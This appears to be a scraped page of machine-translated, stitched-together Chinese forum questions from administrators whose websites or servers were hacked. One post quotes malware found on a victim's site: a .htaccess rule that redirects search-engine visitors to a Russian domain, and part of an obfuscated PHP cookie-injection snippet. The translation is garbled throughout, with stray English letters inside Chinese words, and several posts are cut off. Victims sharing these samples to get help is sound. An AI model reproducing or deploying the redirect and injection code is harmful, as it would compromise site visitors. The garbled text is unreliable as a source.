我的网站被黑了。 我网站上的大多数html和javascript文件都被修改,以包含问题标题中的链接。 我应该采用什么策略来减less我的网站被再次黑客攻击的可能性?
我们的一个网站已经被盗用,我们收到了来自谷歌的警告电子邮件。 该网站已经被谷歌在Firefox中封锁,有没有人看过这种types的攻击? Of the 1 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-11-19, and the last time suspicious content was found on this site was on 2009-11-19. Malicious software […]
我刚刚inheritance的Ubuntu Web服务器已经被入侵。 我是一个Windowspipe理员,不太熟悉Linux。 我将如何去发现什么让生成perl进程? 我杀了几十个/ usr / bin / perl的实例,但是它们立刻又产生了。 我甚至更名为/ usr / bin / perl,但进程仍然回来。 我意识到我必须加载服务器,但是我需要设置一个replace,然后才能使网站脱机。
我怎么能发现,如果我的服务器正在执行一些非法的行为,如洪水?
我有一个网站和数据库的表中的mysql条目被删除或更改值。 我发现黑客很快,但他只做了一些小的改变。 我在网站上有一些表单。 他有可能使用注射吗? 如何弄清楚他是如何做到的? 首先要testing什么?
在我们的办公室,我们正在运行Cisco ASA 5510防火墙。 如果我们想要防范DDoS攻击,这个设备是否足够了? 你推荐什么设备(如思科卫士等),以及用户使用这些设备的经验是什么? 问候,
间歇性的,而不是在同一时间,连接networking的计算机将redirect到Stop-online-piracy.com (可能不想去那里)。 域名响应来源: <div id="Message"> ERROR: This web site encountered an error (40100), please notify your Technical Support.</div> 只是一个错误,没有隐藏在那里。 它是私人注册的。 看起来像是一个假冒伪装的人。 谷歌search的域没有任何引用。 另一个奇怪的部分是,就在它发生之前,互联网连接变得非常慢,无线信号栏下降。 这个信号栏可能只是Windows 7的连接速度添加到任务栏图标。 (或者它可能表明一些真正有趣的事情…)如果有问题的话,WiFi使用的是WPA2。 没有太多的计算机被插入以太网,所以不知道它是否影响到他们。 编辑:当我说不是在同一时间,我的意思是不完全相同,但在几分钟内彼此。 我现在平息了。 还有什么我可以做,如果/当它再次发生? 它似乎是在波涛汹涌。
注释的代码在这里: http : //pastebay.com/145971 看起来像这个职位非常类似的情况 我对python不太好,所以我想我可能会在这里寻求帮助。 hack似乎在面向用户的页面上包含一个iframe,但从我上面提到的问题来看,这可能不是全部!
我有一个托pipeDreamhost的网站,我的.htaccess文件的内容一遍又一遍地被攻破。 有人把这样的东西放在我的代码前面: RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://float-answer.ru/access/index.php 该文件的chmod是744.从文件的最后修改时间,我可以估计什么时候发生了攻击。 没有任何东西似乎在网站上受到攻击。 我已经更改了所有相关的密码。 编辑:这似乎更糟! 这个代码已经注入了几个php文件: global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j […]
Debian服务器今天早些时候停止响应。 硬件重置后,服务器上的数据在几个月前回滚到了二月份的状态。 这怎么可能?一切,日志,webdata,数据库,就好像电脑已经在二月三日closures了,并且在今天依然如此。 有谁知道可能会导致这种情况? 黑客攻击? 我怎样才能防止这种情况再次发生? 非常感谢! 编辑: 这里是真正发生的更新。 在服务器上有一个镜像RAIDconfiguration。 其中一台硬盘在2月3日停止了写入数据。 当今天早些时候第二个硬盘坏掉时,系统只能从第一个硬盘启动。 这就是为什么所有的数据都是这样的。 显然,这是一百万的情况。 编辑: 所以你不要和我一样 http://www.tcpdump.com/kb/os/linux/raid-alerting.html